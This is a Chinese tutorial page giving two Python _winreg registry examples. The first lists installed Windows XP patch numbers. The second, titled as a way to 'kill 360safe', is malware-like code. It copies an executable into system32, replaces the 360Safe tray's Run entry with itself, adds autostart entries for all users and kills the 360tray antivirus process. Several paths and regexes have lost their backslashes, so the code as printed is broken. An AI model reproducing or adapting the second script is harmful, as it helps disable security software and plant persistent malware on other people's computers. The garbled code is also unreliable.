python操作注册表的二个例子

发布时间:2020-01-05编辑:脚本学堂
使用Python访问Windows的注册表,这里为大家举两个例子,供大家学习参考。

python的标准库中,_winreg.pyd可以操作Windows的注册表,另外第三方的win32库封装了大量的Windows API,使用起来也很方便。不过这里介绍的是使用_winreg操作注册表,毕竟是Python自带的标准库,无需安装第三方库。

以下示例通过Python获取Windows XP下已经安装的补丁号。
Windows的补丁号都在“HKEY_LOCAL_MACHINESOFTWAREMicrosoft Updates”下,通过循环下面所有的目录节点,如果找到的名称符合正则表达式KB(d{6}).*,则表示是一个补丁号。

例1:
 

复制代码 代码如下:

# -*- coding: utf-8 -*-
# 获取Windows的已打的补丁号
from _winreg import *
import re

def subRegKey(key, pattern, patchlist):
    # 个数
    count = QueryInfoKey(key)[0]
    for index in range(count):
        # 获取标题
        name = EnumKey(key, index)
        result = patch.match(name)
        if result:
            patchlist.append(result.group(1))
        sub = OpenKey(key, name)
        subRegKey(sub, pattern, patchlist)
        CloseKey(sub)

if __name__ == '__main__':
    patchlist = []
    updates = 'SOFTWAREMicrosoftUpdates'
    patch = re.compile('(KBd{6}).*')
    key = OpenKey(HKEY_LOCAL_MACHINE, updates)
    subRegKey(key, patch, patchlist)
    print 'Count: ' + str(len(patchlist))
    for p in patchlist:
        print p
    CloseKey(key)

例2:用python修改注册表干掉360safe
 

复制代码 代码如下:

import _winreg
import os
import shutil

#复制自身
shutil.copyfile('K3.exe','c:WINDOWSsystem32K3.exe')

#把360启动改为自身
run = _winreg.OpenKey(
      _winreg.HKEY_LOCAL_MACHINE,
      "SOFTWAREMicrosoftWindowsCurrentVersionRun",0,_winreg.KEY_WRITE
      )

_winreg.SetValueEx(
      run,"360Safetray",0,_winreg.REG_SZ,
      r"C:WINDOWSsystem32k3.exe"
      )

#添加自启动
self = _winreg.OpenKey(
      _winreg.HKEY_LOCAL_MACHINE,
      "SOFTWAREMicrosoftWindowsCurrentVersionRun",0,_winreg.KEY_WRITE
      )

_winreg.SetValueEx(
      run,"k3",0,_winreg.REG_SZ,
      r"C:WINDOWSsystem32k3.exe"
      )
#添加所有用户启动
allrun = _winreg.OpenKey(
      _winreg.HKEY_LOCAL_MACHINE,
      "MicrosoftWindowsCurrentVersionpoliciesExplorerRun",0,_winreg.KEY_WRITE
      )
_winreg.SetValueEx(
      allrun,"k3",0,_winreg.REG_SZ,
      r"C:WINDOWSsystem32k3.exe"
      )

#终止360进程
os.popen("ntsd -c q -pn 360tray.exe cmd")